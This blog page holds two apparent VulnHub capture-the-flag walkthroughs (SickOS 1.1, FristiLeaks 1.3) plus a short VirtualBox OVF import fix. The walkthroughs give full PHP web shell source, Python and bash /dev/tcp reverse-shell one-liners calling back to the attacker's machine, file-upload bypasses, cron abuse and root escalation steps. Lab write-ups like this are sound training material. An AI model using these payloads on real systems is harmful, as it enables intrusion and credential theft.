1/19/2016

vulnhub.com sickos1.1 

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/26 19:00 -> 19:40 (40min)
  # 2015/12/26 22:10 -> 23:50 (1hr 40min)
  # 2015/12/27 18:20 -> 18:40 (20min)
  # total time = 2hr 40min)

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found: 192.168.56.102

* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??
  * !!exploit-db did not reveal much
  * tried: nc -n -v 192.168.56.102 3128
  * with GET /
    * found: invalid URL error
  * with GET http://127.0.0.1/
    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21
  * using proxy: export http_proxy="http://192.168.56.102:3128"
  * wget http://192.168.56.102/robots.txt
  * found http://192.168.56.102/wolfcms
  * !!decided to use iceweasel with proxy instead of command line
    * did not find generator metatag
    * downloaded wolfcms
      * found: README.md, requested http://192.168.56.102/wolfcms/README.md
      * found: version = 0.8.2
      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css
      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable
      * found: that file_manager plugin is installed
    * read 
      - https://www.wolfcms.org/download/security-patches.html
      - http://www.securityfocus.com/archive/1/521797
      - https://www.exploit-db.com/exploits/36818/
      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 
      - https://github.com/wolfcms/wolfcms/issues/619
    * vulnerabilities
      * file upload
      * open redirect
    * stupidly tried admin/admin
    * uploaded shell.php using file uploaded
    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id
    * used shell.php 
      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"
      * found: mysql db=wolf, username=root, password=john@123
    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"
      * found:
    * used shell.php to list directories
      * found: /var/www/connect.py
    * attempted python reverse shell
      * kali - nc -vvv -l -p 1234
      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"
    * attempted to get tty, inside reverse shell
      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
    * tried to use su - sickos, using the mysql password john@123, worked!!
    * sudo bash
    * ls -l /root
    * cat a0216ea4d51874464078c618298b1367.txt
    


* appendix

// shell.php
-- start of shell.php --
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of shell.php --
No comments:
Labels: , , , , ,

Error importing into Virtualbox

Open visualisation format (OVF) is an open standard for packaging and distributing virtual appliances. Essentially this is meant to ensure portability of software and virtual machines across different hypervisors, such as vmware, virtualbox, etc. However, I got an error when importing an OVF file into virtualbox Version 5.0.12 r104815

"Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47."

Error reading "XXXXXX.ovf": Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47.


Result Code: 
VBOX_E_FILE_ERROR (0x80BB0004)
Component: 
ApplianceWrap
Interface: 
IAppliance {XXXXXX}

Fixed it by following the instructions on the forum[1]
  1. Edited .ovf file in vim.
    • :%s/ElementName/Caption/g
    • :%s/vmware.sata.ahci/AHCI/
  2. Deleted .mf file, else get an error regarding failure to verify manifest

Attempted re-import of appliance into VirtualBox 5. Only noticeable issue was the name defaulted to "vm", which was easily resolved by double clicking name and entering correct name for the virtual machine.

References:

  1. https://forums.virtualbox.org/viewtopic.php?f=8&t=61624
No comments:
Labels: , , , , ,

vulnhub.com fristileaks1.3 

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * since its not the URL, and we should drink fristi
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read description meta tag reg comment about base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded and connected
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed pythong issues
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old script to execute commands
  * renamed to shell.php.jpg
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * function does base64 then rot13
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: suid/guid set on doCom file and owned by root:root
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: cat /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script


// modified cryptpass.py script
-- start of decryptpass.py script --
import base64,codecs,sys

#def encodeString(str):
#    base64string= base64.b64encode(str)
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str):
    rottedString= codecs.encode(str[::-1], 'rot13')
    return base64.b64decode(rottedString)

#cryptoResult=encodeString(sys.argv[1])
#print cryptoResult

#decryptedResult=decodeString(cryptoResult)
#print decryptedResult

decryptedResult=decodeString(sys.argv[1])
print decryptedResult
-- end of decryptpass.py script --
No comments:
Labels: , , , , , , , , ,
Subscribe to: Posts (Atom)